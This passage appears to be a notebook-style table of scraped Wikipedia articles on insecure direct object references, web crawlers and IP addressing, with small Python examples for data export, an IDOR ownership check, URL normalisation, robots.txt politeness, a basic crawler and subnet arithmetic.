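The article above notes that extracted data are usually structured into CSV, XML, or JSON. A minimal sketch of that step with the pandas import from earlier in this notebook follows; the records are invented placeholders standing in for whatever a scraper returned.
import pandas as pd

records = [
    {"source_url": "https://example.com/a", "title": "Page A", "word_count": 812},
    {"source_url": "https://example.com/b", "title": "Page B", "word_count": 433},
]
df = pd.DataFrame(records)
# Persist the same table in the three formats mentioned above
df.to_csv("scraped.csv", index=False)
df.to_json("scraped.json", orient="records", indent=2)
df.to_xml("scraped.xml", index=False)  # to_xml needs pandas >= 1.3 with lxml installed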
243 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Insecure_direct_object_reference | Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. 1 This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. For example, if the request URL sent to a web site directly uses an easily enumerated unique identifier (such as http://foo.com/doc/1234), that can provide an exploit for unintended access to all records. A directory traversal attack is considered a special case of an IDOR. 2 The vulnerability is of such significant concern that for many years it was listed as one of the Open Web Application Security Project's (OWASP) Top 10 vulnerabilities. 3 In November 2020, the firm Silent Breach identified an IDOR vulnerability with the United States Department of Defense web site and privately reported it via the DOD's Vulnerability Disclosure Program. The bug was fixed by adding a user session mechanism to the account system, which would require authenticating on the site first. 4 It was reported that the Parler social networking service used sequential post IDs, and that this had enabled the scraping of terabytes of data from the service in January 2021. The researcher responsible for the project has said this was inaccurate. 5 6 |
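A hedged illustration of the missing check that defines an IDOR: the data, identifiers, and user names below are hypothetical, and the point is only that the record's owner is compared against the authenticated caller before anything is returned.
DOCUMENTS = {
    1234: {"owner": "alice", "body": "Alice's private report"},
    1235: {"owner": "bob", "body": "Bob's private report"},
}

def get_document(doc_id, authenticated_user):
    # Return a document only if the authenticated caller owns it
    record = DOCUMENTS.get(doc_id)
    if record is None:
        raise KeyError("no such document")
    # Without this ownership check, any caller could walk doc_id = 1234, 1235, ...
    # and read every record -- the enumeration pattern described above
    if record["owner"] != authenticated_user:
        raise PermissionError("caller does not own this document")
    return record["body"]

print(get_document(1234, "alice"))   # allowed
# get_document(1234, "bob")          # would raise PermissionError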
244 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_crawler | A Web crawler, sometimes called a spider or spiderbot and often shortened to crawler, is an Internet bot that systematically browses the World Wide Web and that is typically operated by search engines for the purpose of Web indexing (web spidering). 1 Web search engines and some other websites use Web crawling or spidering software to update their web content or indices of other sites' web content. Web crawlers copy pages for processing by a search engine, which indexes the downloaded pages so that users can search more efficiently. Crawlers consume resources on visited systems and often visit sites unprompted. Issues of schedule, load, and "politeness" come into play when large collections of pages are accessed. Mechanisms exist for public sites not wishing to be crawled to make this known to the crawling agent. For example, including a robots.txt file can request bots to index only parts of a website, or nothing at all. The number of Internet pages is extremely large; even the largest crawlers fall short of making a complete index. For this reason, search engines struggled to give relevant search results in the early years of the World Wide Web, before 2000. Today, relevant results are given almost instantly. Crawlers can validate hyperlinks and HTML code. They can also be used for web scraping and data-driven programming. A web crawler is also known as a spider, 2 an ant, an automatic indexer, 3 or (in the FOAF software context) a Web scutter. 4 A Web crawler starts with a list of URLs to visit. Those first URLs are called the seeds. As the crawler visits these URLs, by communicating with web servers that respond to those URLs, it identifies all the hyperlinks in the retrieved web pages and adds them to the list of URLs to visit, called the crawl frontier. URLs from the frontier are recursively visited according to a set of policies. If the crawler is performing archiving of websites (or web archiving), it copies and saves the information as it goes. The archives are usually stored in such a way they can be viewed, read and navigated as if they were on the live web, but are preserved as 'snapshots'. 5 The archive is known as the repository and is designed to store and manage the collection of web pages. The repository only stores HTML pages and these pages are stored as distinct files. A repository is similar to any other system that stores data, like a modern-day database. The only difference is that a repository does not need all the functionality offered by a database system. The repository stores the most recent version of the web page retrieved by the crawler. citation needed The large volume implies the crawler can only download a limited number of the Web pages within a given time, so it needs to prioritize its downloads. The high rate of change can imply the pages might have already been updated or even deleted. The number of possible URLs crawled being generated by server-side software has also made it difficult for web crawlers to avoid retrieving duplicate content. Endless combinations of HTTP GET (URL-based) parameters exist, of which only a small selection will actually return unique content. For example, a simple online photo gallery may offer three options to users, as specified through HTTP GET parameters in the URL. 
If there exist four ways to sort images, three choices of thumbnail size, two file formats, and an option to disable user-provided content, then the same set of content can be accessed with 48 different URLs, all of which may be linked on the site. This mathematical combination creates a problem for crawlers, as they must sort through endless combinations of relatively minor scripted changes in order to retrieve unique content. As Edwards et al. noted, "Given that the bandwidth for conducting crawls is neither infinite nor free, it is becoming essential to crawl the Web in not only a scalable, but efficient way, if some reasonable measure of quality or freshness is to be maintained. 6 A crawler must carefully choose at each step which pages to visit next. The behavior of a Web crawler is the outcome of a combination of policies: 7 Given the current size of the Web, even large search engines cover only a portion of the publicly available part. A 2009 study showed even large-scale search engines index no more than 40 70% of the indexable Web; 8 a previous study by Steve Lawrence and Lee Giles showed that no search engine indexed more than 16% of the Web in 1999. 9 As a crawler always downloads just a fraction of the Web pages, it is highly desirable for the downloaded fraction to contain the most relevant pages and not just a random sample of the Web. This requires a metric of importance for prioritizing Web pages. The importance of a page is a function of its intrinsic quality, its popularity in terms of links or visits, and even of its URL (the latter is the case of vertical search engines restricted to a single top-level domain, or search engines restricted to a fixed Web site). Designing a good selection policy has an added difficulty: it must work with partial information, as the complete set of Web pages is not known during crawling. Junghoo Cho et al. made the first study on policies for crawling scheduling. Their data set was a 180,000 pages crawl from the stanford.edu domain, in which a crawling simulation was done with different strategies. 10 The ordering metrics tested were breadth-first, backlink count and partial PageRank calculations. One of the conclusions was that if the crawler wants to download pages with high Pagerank early during the crawling process, then the partial Pagerank strategy is the better, followed by breadth-first and backlink-count. However, these results are for just a single domain. Cho also wrote his PhD dissertation at Stanford on web crawling. 11 Najork and Wiener performed an actual crawl on 328 million pages, using breadth-first ordering. 12 They found that a breadth-first crawl captures pages with high Pagerank early in the crawl (but they did not compare this strategy against other strategies). The explanation given by the authors for this result is that "the most important pages have many links to them from numerous hosts, and those links will be found early, regardless of on which host or page the crawl originates. Abiteboul designed a crawling strategy based on an algorithm called OPIC (On-line Page Importance Computation). 13 In OPIC, each page is given an initial sum of "cash" that is distributed equally among the pages it points to. It is similar to a PageRank computation, but it is faster and is only done in one step. An OPIC-driven crawler downloads first the pages in the crawling frontier with higher amounts of "cash". Experiments were carried in a 100,000 pages synthetic graph with a power-law distribution of in-links. 
However, there was no comparison with other strategies nor experiments in the real Web. Boldi et al. used simulation on subsets of the Web of 40 million pages from the .it domain and 100 million pages from the WebBase crawl, testing breadth-first against depth-first, random ordering and an omniscient strategy. The comparison was based on how well PageRank computed on a partial crawl approximates the true PageRank value. Some visits that accumulate PageRank very quickly (most notably, breadth-first and the omniscient visit) provide very poor progressive approximations. 14 15 Baeza-Yates et al. used simulation on two subsets of the Web of 3 million pages from the .gr and .cl domains, testing several crawling strategies. 16 They showed that both the OPIC strategy and a strategy that uses the length of the per-site queues are better than breadth-first crawling, and that it is also very effective to use a previous crawl, when it is available, to guide the current one. Daneshpajouh et al. designed a community-based algorithm for discovering good seeds. 17 Their method crawls web pages with high PageRank from different communities in fewer iterations than a crawl starting from random seeds. One can extract good seeds from a previously crawled Web graph using this new method. Using these seeds, a new crawl can be very effective. A crawler may only want to seek out HTML pages and avoid all other MIME types. In order to request only HTML resources, a crawler may make an HTTP HEAD request to determine a Web resource's MIME type before requesting the entire resource with a GET request. To avoid making numerous HEAD requests, a crawler may examine the URL and only request a resource if the URL ends with certain characters such as .html, .htm, .asp, .aspx, .php, .jsp, .jspx or a slash. This strategy may cause numerous HTML Web resources to be unintentionally skipped. Some crawlers may also avoid requesting any resources that have a "?" in them (are dynamically produced) in order to avoid spider traps that may cause the crawler to download an infinite number of URLs from a Web site. This strategy is unreliable if the site uses URL rewriting to simplify its URLs. Crawlers usually perform some type of URL normalization in order to avoid crawling the same resource more than once. The term URL normalization, also called URL canonicalization, refers to the process of modifying and standardizing a URL in a consistent manner. There are several types of normalization that may be performed, including conversion of URLs to lowercase, removal of "." and ".." segments, and adding trailing slashes to the non-empty path component. 18 Some crawlers intend to download/upload as many resources as possible from a particular web site. So a path-ascending crawler was introduced that would ascend to every path in each URL that it intends to crawl. 19 For example, when given a seed URL of http://llama.org/hamster/monkey/page.html, it will attempt to crawl /hamster/monkey/, /hamster/, and /. Cothey found that a path-ascending crawler was very effective in finding isolated resources, or resources for which no inbound link would have been found in regular crawling. The importance of a page for a crawler can also be expressed as a function of the similarity of a page to a given query. Web crawlers that attempt to download pages that are similar to each other are called focused crawlers or topical crawlers. The concepts of topical and focused crawling were first introduced by Filippo Menczer 20 21 and by Soumen Chakrabarti et al.
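The URL-normalization and MIME-type-filtering techniques just described can be sketched with the standard library plus the requests import from this notebook. The normalization below covers only a few of the transformations named in the text, and the URLs are examples.
import posixpath
import requests
from urllib.parse import urlparse, urlunparse

def normalize(url):
    # Lowercase the scheme and host, collapse "." and ".." segments,
    # and add a trailing slash to directory-like paths
    parts = urlparse(url)
    path = posixpath.normpath(parts.path) if parts.path else "/"
    if not path.endswith("/") and "." not in path.rsplit("/", 1)[-1]:
        path += "/"
    return urlunparse((parts.scheme.lower(), parts.netloc.lower(), path, parts.params, parts.query, parts.fragment))

def looks_like_html(url):
    # Issue a HEAD request and inspect Content-Type instead of downloading the whole body
    try:
        head = requests.head(url, timeout=10, allow_redirects=True)
        return "text/html" in head.headers.get("Content-Type", "")
    except requests.RequestException:
        return False

print(normalize("HTTP://Example.COM/a/b/../c"))      # http://example.com/a/c/
# looks_like_html("https://example.com/report.pdf")  # likely False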
22 The main problem in focused crawling is that in the context of a Web crawler, we would like to be able to predict the similarity of the text of a given page to the query before actually downloading the page. A possible predictor is the anchor text of links; this was the approach taken by Pinkerton 23 in the first web crawler of the early days of the Web. Diligenti et al. 24 propose using the complete content of the pages already visited to infer the similarity between the driving query and the pages that have not been visited yet. The performance of a focused crawling depends mostly on the richness of links in the specific topic being searched, and a focused crawling usually relies on a general Web search engine for providing starting points. An example of the focused crawlers are academic crawlers, which crawls free-access academic related documents, such as the citeseerxbot, which is the crawler of CiteSeerX search engine. Other academic search engines are Google Scholar and Microsoft Academic Search etc. Because most academic papers are published in PDF formats, such kind of crawler is particularly interested in crawling PDF, PostScript files, Microsoft Word including their zipped formats. Because of this, general open-source crawlers, such as Heritrix, must be customized to filter out other MIME types, or a middleware is used to extract these documents out and import them to the focused crawl database and repository. 25 Identifying whether these documents are academic or not is challenging and can add a significant overhead to the crawling process, so this is performed as a post crawling process using machine learning or regular expression algorithms. These academic documents are usually obtained from home pages of faculties and students or from publication page of research institutes. Because academic documents make up only a small fraction of all web pages, a good seed selection is important in boosting the efficiencies of these web crawlers. 26 Other academic crawlers may download plain text and HTML files, that contains metadata of academic papers, such as titles, papers, and abstracts. This increases the overall number of papers, but a significant fraction may not provide free PDF downloads. Another type of focused crawlers is semantic focused crawler, which makes use of domain ontologies to represent topical maps and link Web pages with relevant ontological concepts for the selection and categorization purposes. 27 In addition, ontologies can be automatically updated in the crawling process. Dong et al. 28 introduced such an ontology-learning-based crawler using a support-vector machine to update the content of ontological concepts when crawling Web pages. The Web has a very dynamic nature, and crawling a fraction of the Web can take weeks or months. By the time a Web crawler has finished its crawl, many events could have happened, including creations, updates, and deletions. From the search engine's point of view, there is a cost associated with not detecting an event, and thus having an outdated copy of a resource. The most-used cost functions are freshness and age. 29 Freshness: This is a binary measure that indicates whether the local copy is accurate or not. The freshness of a page p in the repository at time t is defined as: Age: This is a measure that indicates how outdated the local copy is. The age of a page p in the repository, at time t is defined as: Coffman et al. 
worked with a definition of the objective of a Web crawler that is equivalent to freshness, but use a different wording: they propose that a crawler must minimize the fraction of time pages remain outdated. They also noted that the problem of Web crawling can be modeled as a multiple-queue, single-server polling system, on which the Web crawler is the server and the Web sites are the queues. Page modifications are the arrival of the customers, and switch-over times are the interval between page accesses to a single Web site. Under this model, mean waiting time for a customer in the polling system is equivalent to the average age for the Web crawler. 30 The objective of the crawler is to keep the average freshness of pages in its collection as high as possible, or to keep the average age of pages as low as possible. These objectives are not equivalent: in the first case, the crawler is just concerned with how many pages are outdated, while in the second case, the crawler is concerned with how old the local copies of pages are. Two simple re-visiting policies were studied by Cho and Garcia-Molina: 31 In both cases, the repeated crawling order of pages can be done either in a random or a fixed order. Cho and Garcia-Molina proved the surprising result that, in terms of average freshness, the uniform policy outperforms the proportional policy in both a simulated Web and a real Web crawl. Intuitively, the reasoning is that, as web crawlers have a limit to how many pages they can crawl in a given time frame, (1) they will allocate too many new crawls to rapidly changing pages at the expense of less frequently updating pages, and (2) the freshness of rapidly changing pages lasts for shorter period than that of less frequently changing pages. In other words, a proportional policy allocates more resources to crawling frequently updating pages, but experiences less overall freshness time from them. To improve freshness, the crawler should penalize the elements that change too often. 32 The optimal re-visiting policy is neither the uniform policy nor the proportional policy. The optimal method for keeping average freshness high includes ignoring the pages that change too often, and the optimal for keeping average age low is to use access frequencies that monotonically (and sub-linearly) increase with the rate of change of each page. In both cases, the optimal is closer to the uniform policy than to the proportional policy: as Coffman et al. note, "in order to minimize the expected obsolescence time, the accesses to any particular page should be kept as evenly spaced as possible". 30 Explicit formulas for the re-visit policy are not attainable in general, but they are obtained numerically, as they depend on the distribution of page changes. Cho and Garcia-Molina show that the exponential distribution is a good fit for describing page changes, 32 while Ipeirotis et al. show how to use statistical tools to discover parameters that affect this distribution. 33 The re-visiting policies considered here regard all pages as homogeneous in terms of quality ("all pages on the Web are worth the same"), something that is not a realistic scenario, so further information about the Web page quality should be included to achieve a better crawling policy. Crawlers can retrieve data much quicker and in greater depth than human searchers, so they can have a crippling impact on the performance of a site. 
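The freshness and age formulas referenced earlier in this row did not survive the scrape; what follows is a reconstruction of the standard Cho and Garcia-Molina definitions, written in LaTeX, not text recovered from the page.
% Freshness of page p at time t: 1 if the local copy matches the live page, 0 otherwise
F_p(t) =
\begin{cases}
1 & \text{if } p \text{ is equal to the local copy at time } t \\
0 & \text{otherwise}
\end{cases}

% Age of page p at time t: 0 while the copy is current, otherwise the time since the live page changed
A_p(t) =
\begin{cases}
0 & \text{if } p \text{ is not modified at time } t \\
t - \text{modification time of } p & \text{otherwise}
\end{cases}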
If a single crawler is performing multiple requests per second and or downloading large files, a server can have a hard time keeping up with requests from multiple crawlers. As noted by Koster, the use of Web crawlers is useful for a number of tasks, but comes with a price for the general community. 34 The costs of using Web crawlers include: A partial solution to these problems is the robots exclusion protocol, also known as the robots.txt protocol that is a standard for administrators to indicate which parts of their Web servers should not be accessed by crawlers. 35 This standard does not include a suggestion for the interval of visits to the same server, even though this interval is the most effective way of avoiding server overload. Recently commercial search engines like Google, Ask Jeeves, MSN and Yahoo Search are able to use an extra "Crawl-delay: parameter in the robots.txt file to indicate the number of seconds to delay between requests. The first proposed interval between successive pageloads was 60 seconds. 36 However, if pages were downloaded at this rate from a website with more than 100,000 pages over a perfect connection with zero latency and infinite bandwidth, it would take more than 2 months to download only that entire Web site; also, only a fraction of the resources from that Web server would be used. Cho uses 10 seconds as an interval for accesses, 31 and the WIRE crawler uses 15 seconds as the default. 37 The MercatorWeb crawler follows an adaptive politeness policy: if it took t seconds to download a document from a given server, the crawler waits for 10t seconds before downloading the next page. 38 Dill et al. use 1 second. 39 For those using Web crawlers for research purposes, a more detailed cost-benefit analysis is needed and ethical considerations should be taken into account when deciding where to crawl and how fast to crawl. 40 Anecdotal evidence from access logs shows that access intervals from known crawlers vary between 20 seconds and 3 4 minutes. It is worth noticing that even when being very polite, and taking all the safeguards to avoid overloading Web servers, some complaints from Web server administrators are received. Sergey Brin and Larry Page noted in 1998, ... running a crawler which connects to more than half a million servers ... generates a fair amount of e-mail and phone calls. Because of the vast number of people coming on line, there are always those who do not know what a crawler is, because this is the first one they have seen. 41 A parallel crawler is a crawler that runs multiple processes in parallel. The goal is to maximize the download rate while minimizing the overhead from parallelization and to avoid repeated downloads of the same page. To avoid downloading the same page more than once, the crawling system requires a policy for assigning the new URLs discovered during the crawling process, as the same URL can be found by two different crawling processes. A crawler must not only have a good crawling strategy, as noted in the previous sections, but it should also have a highly optimized architecture. Shkapenyuk and Suel noted that: 42 While it is fairly easy to build a slow crawler that downloads a few pages per second for a short period of time, building a high-performance system that can download hundreds of millions of pages over several weeks presents a number of challenges in system design, I O and network efficiency, and robustness and manageability. 
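A hedged sketch of the politeness measures discussed above, combining the standard library's urllib.robotparser with a per-request delay; the user-agent string and the fallback delay are illustrative choices, not recommendations.
import time
import requests
from urllib import robotparser
from urllib.parse import urlparse

USER_AGENT = "ExampleResearchCrawler/0.1"  # hypothetical identifying user agent

def polite_get(url, default_delay=10.0):
    root = "{0.scheme}://{0.netloc}".format(urlparse(url))
    rp = robotparser.RobotFileParser()
    rp.set_url(root + "/robots.txt")
    rp.read()
    if not rp.can_fetch(USER_AGENT, url):
        return None  # the site's robots.txt disallows this path for our agent
    delay = rp.crawl_delay(USER_AGENT) or default_delay  # honour Crawl-delay if present
    response = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(delay)  # wait before the next request to the same host
    return response

# polite_get("https://en.wikipedia.org/wiki/Web_crawler")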
Web crawlers are a central part of search engines, and details on their algorithms and architecture are kept as business secrets. When crawler designs are published, there is often an important lack of detail that prevents others from reproducing the work. There are also emerging concerns about "search engine spamming", which prevent major search engines from publishing their ranking algorithms. While most of the website owners are keen to have their pages indexed as broadly as possible to have strong presence in search engines, web crawling can also have unintended consequences and lead to a compromise or data breach if a search engine indexes resources that should not be publicly available, or pages revealing potentially vulnerable versions of software. Apart from standard web application security recommendations website owners can reduce their exposure to opportunistic hacking by only allowing search engines to index the public parts of their websites (with robots.txt) and explicitly blocking them from indexing transactional parts (login pages, private pages, etc.). Web crawlers typically identify themselves to a Web server by using the User-agent field of an HTTP request. Web site administrators typically examine their Web servers' log and use the user agent field to determine which crawlers have visited the web server and how often. The user agent field may include a URL where the Web site administrator may find out more information about the crawler. Examining Web server log is tedious task, and therefore some administrators use tools to identify, track and verify Web crawlers. Spambots and other malicious Web crawlers are unlikely to place identifying information in the user agent field, or they may mask their identity as a browser or other well-known crawler. Web site administrators prefer Web crawlers to identify themselves so that they can contact the owner if needed. In some cases, crawlers may be accidentally trapped in a crawler trap or they may be overloading a Web server with requests, and the owner needs to stop the crawler. Identification is also useful for administrators that are interested in knowing when they may expect their Web pages to be indexed by a particular search engine. A vast amount of web pages lie in the deep or invisible web. 43 These pages are typically only accessible by submitting queries to a database, and regular crawlers are unable to find these pages if there are no links that point to them. Google's Sitemaps protocol and mod oai 44 are intended to allow discovery of these deep-Web resources. Deep web crawling also multiplies the number of web links to be crawled. Some crawlers only take some of the URLs in a href "URL" form. In some cases, such as the Googlebot, Web crawling is done on all text contained inside the hypertext content, tags, or text. Strategic approaches may be taken to target deep Web content. With a technique called screen scraping, specialized software may be customized to automatically and repeatedly query a given Web form with the intention of aggregating the resulting data. Such software can be used to span multiple Web forms across multiple Websites. Data extracted from the results of one Web form submission can be taken and applied as input to another Web form thus establishing continuity across the Deep Web in a way not possible with traditional web crawlers. 45 Pages built on AJAX are among those causing problems to web crawlers. Google has proposed a format of AJAX calls that their bot can recognize and index. 
46 There are a number of "visual web scraper/crawler" products available on the web which will crawl pages and structure data into columns and rows based on the user's requirements. One of the main differences between a classic and a visual crawler is the level of programming ability required to set up a crawler. The latest generation of "visual scrapers" removes most of the programming skill needed to set up and start a crawl that scrapes web data. The visual scraping/crawling method relies on the user "teaching" a piece of crawler technology, which then follows patterns in semi-structured data sources. The dominant method for teaching a visual crawler is by highlighting data in a browser and training columns and rows. While the technology is not new, for example it was the basis of Needlebase, which was bought by Google (as part of a larger acquisition of ITA Labs 47 ), there is continued growth and investment in this area by investors and end-users. The following is a list of published crawler architectures for general-purpose crawlers (excluding focused web crawlers), with a brief description that includes the names given to the different components and outstanding features: The following web crawlers are available, for a price: |
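The seed-and-frontier loop described earlier in this row can be sketched with the requests, BeautifulSoup, and urljoin imports from the top of this notebook; the seed URL, page limit, and delay below are arbitrary illustration values.
import time
from collections import deque
from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup

def crawl(seeds, max_pages=10, delay=1.0):
    frontier = deque(seeds)  # the crawl frontier: URLs still to visit
    visited = set()
    while frontier and len(visited) < max_pages:
        url = frontier.popleft()
        if url in visited:
            continue
        try:
            response = requests.get(url, timeout=10)
            response.raise_for_status()
        except requests.RequestException:
            continue
        visited.add(url)
        soup = BeautifulSoup(response.text, "html.parser")
        # Extract hyperlinks from the retrieved page and add them to the frontier
        for anchor in soup.find_all("a", href=True):
            link = urljoin(url, anchor["href"])
            if link.startswith("http") and link not in visited:
                frontier.append(link)
        time.sleep(delay)  # crude politeness between requests
    return visited

# crawl(["https://example.com/"])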
245 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/IP_address | An Internet Protocol address (IP address) is a numerical label such as 192.0.2.1 that is assigned to a device connected to a computer network that uses the Internet Protocol for communication. 1 2 IP addresses serve two main functions: network interface identification, and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32 bit number. 2 However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. 3 4 5 IPv6 deployment has been ongoing since the mid 2000s. IP addresses are written and displayed in human-readable notations, such as 192.0.2.1 in IPv4, and 2001:db8:0:1234:0:567:8:1 in IPv6. The size of the routing prefix of the address is designated in CIDR notation by suffixing the address with the number of significant bits, e.g., 192.0.2.1 24, which is equivalent to the historically used subnet mask 255.255.255.0. The IP address space is managed globally by the Internet Assigned Numbers Authority (IANA), and by five regional Internet registries (RIRs) responsible in their designated territories for assignment to local Internet registries, such as Internet service providers (ISPs), and other end users. IPv4 addresses were distributed by IANA to the RIRs in blocks of approximately 16.8 million addresses each, but have been exhausted at the IANA level since 2011. Only one of the RIRs still has a supply for local assignments in Africa. 6 Some IPv4 addresses are reserved for private networks and are not globally unique. Network administrators assign an IP address to each device connected to a network. Such assignments may be on a static (fixed or permanent) or dynamic basis, depending on network practices and software features. Some jurisdictions consider IP addresses to be personal data. An IP address serves two principal functions: it identifies the host, or more specifically, its network interface, and it provides the location of the host in the network, and thus, the capability of establishing a path to that host. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there. 2 The header of each IP packet contains the IP address of the sending host and that of the destination host. Two versions of the Internet Protocol are in common use on the Internet today. The original version of the Internet Protocol that was first deployed in 1983 in the ARPANET, the predecessor of the Internet, is Internet Protocol version 4 (IPv4). By the early 1990s, the rapid exhaustion of IPv4 address space available for assignment to Internet service providers and end-user organizations prompted the Internet Engineering Task Force (IETF) to explore new technologies to expand addressing capability on the Internet. The result was a redesign of the Internet Protocol which became eventually known as Internet Protocol Version 6 (IPv6) in 1995. 3 4 5 IPv6 technology was in various testing stages until the mid 2000s when commercial production deployment commenced. Today, these two versions of the Internet Protocol are in simultaneous use. Among other technical changes, each version defines the format of addresses differently. Because of the historical prevalence of IPv4, the generic term IP address typically still refers to the addresses defined by IPv4. 
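The CIDR/subnet-mask equivalence mentioned above (192.0.2.1/24 corresponds to the mask 255.255.255.0) can be checked with the standard library's ipaddress module; the addresses are the same documentation examples used in the article.
import ipaddress

interface = ipaddress.ip_interface("192.0.2.1/24")
print(interface.ip)        # 192.0.2.1
print(interface.network)   # 192.0.2.0/24 -- the first 24 bits identify the network
print(interface.netmask)   # 255.255.255.0 -- the historical subnet-mask form
print(ipaddress.ip_network("192.0.2.0/24").num_addresses)  # 256 addresses in a /24
print(2 ** 32)             # 4294967296, the size of the whole IPv4 address space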
The gap in version sequence between IPv4 and IPv6 resulted from the assignment of version 5 to the experimental Internet Stream Protocol in 1979, which however was never referred to as IPv5. Other versions v1 to v9 were defined, but only v4 and v6 ever gained widespread use. v1 and v2 were names for TCP protocols in 1974 and 1977, as there was no separate IP specification at the time. v3 was defined in 1978, and v3.1 is the first version where TCP is separated from IP. v6 is a synthesis of several suggested versions, v6 Simple Internet Protocol, v7 TP IX: The Next Internet, v8 PIP — The P Internet Protocol, and v9 TUBA — Tcp Udp with Big Addresses. 7 IP networks may be divided into subnetworks in both IPv4 and IPv6. For this purpose, an IP address is recognized as consisting of two parts: the network prefix in the high-order bits and the remaining bits called the rest field, host identifier, or interface identifier (IPv6), used for host numbering within a network. 1 The subnet mask or CIDR notation determines how the IP address is divided into network and host parts. The term subnet mask is only used within IPv4. Both IP versions however use the CIDR concept and notation. In this, the IP address is followed by a slash and the number (in decimal) of bits used for the network part, also called the routing prefix. For example, an IPv4 address and its subnet mask may be 192.0.2.1 and 255.255.255.0, respectively. The CIDR notation for the same IP address and subnet is 192.0.2.1 24, because the first 24 bits of the IP address indicate the network and subnet. An IPv4 address has a size of 32 bits, which limits the address space to 4294967296 (232) addresses. Of this number, some addresses are reserved for special purposes such as private networks ( 18 million addresses) and multicast addressing ( 270 million addresses). IPv4 addresses are usually represented in dot-decimal notation, consisting of four decimal numbers, each ranging from 0 to 255, separated by dots, e.g., 192.0.2.1. Each part represents a group of 8 bits (an octet) of the address. 8 In some cases of technical writing, specify IPv4 addresses may be presented in various hexadecimal, octal, or binary representations. In the early stages of development of the Internet Protocol, the network number was always the highest order octet (most significant eight bits). Because this method allowed for only 256 networks, it soon proved inadequate as additional networks developed that were independent of the existing networks already designated by a network number. In 1981, the addressing specification was revised with the introduction of classful network architecture. 2 Classful network design allowed for a larger number of individual network assignments and fine-grained subnetwork design. The first three bits of the most significant octet of an IP address were defined as the class of the address. Three classes (A, B, and C) were defined for universal unicast addressing. Depending on the class derived, the network identification was based on octet boundary segments of the entire address. Each class used successively additional octets in the network identifier, thus reducing the possible number of hosts in the higher order classes (B and C). The following table gives an overview of this now-obsolete system. Classful network design served its purpose in the startup stage of the Internet, but it lacked scalability in the face of the rapid expansion of networking in the 1990s. 
The class system of the address space was replaced with Classless Inter-Domain Routing (CIDR) in 1993. CIDR is based on variable-length subnet masking (VLSM) to allow allocation and routing based on arbitrary-length prefixes. Today, remnants of classful network concepts function only in a limited scope as the default configuration parameters of some network software and hardware components (e.g. netmask), and in the technical jargon used in network administrators' discussions. Early network design, when global end-to-end connectivity was envisioned for communications with all Internet hosts, intended that IP addresses be globally unique. However, it was found that this was not always necessary as private networks developed and public address space needed to be conserved. Computers not connected to the Internet, such as factory machines that communicate only with each other via TCP/IP, need not have globally unique IP addresses. Today, such private networks are widely used and typically connect to the Internet with network address translation (NAT), when needed. Three non-overlapping ranges of IPv4 addresses for private networks are reserved. 9 These addresses are not routed on the Internet and thus their use need not be coordinated with an IP address registry. Any user may use any of the reserved blocks. Typically, a network administrator will divide a block into subnets; for example, many home routers automatically use a default address range of 192.168.0.0 through 192.168.0.255 (192.168.0.0/24). In IPv6, the address size was increased from 32 bits in IPv4 to 128 bits, thus providing up to 2^128 (approximately 3.403×10^38) addresses. This is deemed sufficient for the foreseeable future. The intent of the new design was not to provide just a sufficient quantity of addresses, but also to redesign routing in the Internet by allowing more efficient aggregation of subnetwork routing prefixes. This resulted in slower growth of routing tables in routers. The smallest possible individual allocation is a subnet for 2^64 hosts, which is the square of the size of the entire IPv4 Internet. At these levels, actual address utilization ratios will be small on any IPv6 network segment. The new design also provides the opportunity to separate the addressing infrastructure of a network segment, i.e. the local administration of the segment's available space, from the addressing prefix used to route traffic to and from external networks. IPv6 has facilities that automatically change the routing prefix of entire networks, should the global connectivity or the routing policy change, without requiring internal redesign or manual renumbering. The large number of IPv6 addresses allows large blocks to be assigned for specific purposes and, where appropriate, to be aggregated for efficient routing. With a large address space, there is no need to have complex address conservation methods as used in CIDR. All modern desktop and enterprise server operating systems include native support for IPv6, but it is not yet widely deployed in other devices, such as residential networking routers, voice over IP (VoIP) and multimedia equipment, and some networking hardware. Just as IPv4 reserves addresses for private networks, blocks of addresses are set aside in IPv6. In IPv6, these are referred to as unique local addresses (ULAs). The routing prefix fc00::/7 is reserved for this block, 10 which is divided into two /8 blocks with different implied policies.
The addresses include a 40 bit pseudorandom number that minimizes the risk of address collisions if sites merge or packets are misrouted. Early practices used a different block for this purpose (fec0::), dubbed site-local addresses. 11 However, the definition of what constituted a site remained unclear and the poorly defined addressing policy created ambiguities for routing. This address type was abandoned and must not be used in new systems. 12 Addresses starting with fe80::, called link-local addresses, are assigned to interfaces for communication on the attached link. The addresses are automatically generated by the operating system for each network interface. This provides instant and automatic communication between all IPv6 hosts on a link. This feature is used in the lower layers of IPv6 network administration, such as for the Neighbor Discovery Protocol. Private and link-local address prefixes may not be routed on the public Internet. IP addresses are assigned to a host either dynamically as they join the network, or persistently by configuration of the host hardware or software. Persistent configuration is also known as using a static IP address. In contrast, when a computer's IP address is assigned each time it restarts, this is known as using a dynamic IP address. Dynamic IP addresses are assigned by network using Dynamic Host Configuration Protocol (DHCP). 13 DHCP is the most frequently used technology for assigning addresses. It avoids the administrative burden of assigning specific static addresses to each device on a network. It also allows devices to share the limited address space on a network if only some of them are online at a particular time. Typically, dynamic IP configuration is enabled by default in modern desktop operating systems. The address assigned with DHCP is associated with a lease and usually has an expiration period. If the lease is not renewed by the host before expiry, the address may be assigned to another device. Some DHCP implementations attempt to reassign the same IP address to a host, based on its MAC address, each time it joins the network. A network administrator may configure DHCP by allocating specific IP addresses based on MAC address. DHCP is not the only technology used to assign IP addresses dynamically. Bootstrap Protocol is a similar protocol and predecessor to DHCP. Dialup and some broadband networks use dynamic address features of the Point-to-Point Protocol. Computers and equipment used for the network infrastructure, such as routers and mail servers, are typically configured with static addressing. In the absence or failure of static or dynamic address configurations, an operating system may assign a link-local address to a host using stateless address autoconfiguration. Sticky is an informal term used to describe a dynamically assigned IP address that seldom changes. 14 IPv4 addresses, for example, are usually assigned with DHCP, and a DHCP service can use rules that maximize the chance of assigning the same address each time a client asks for an assignment. In 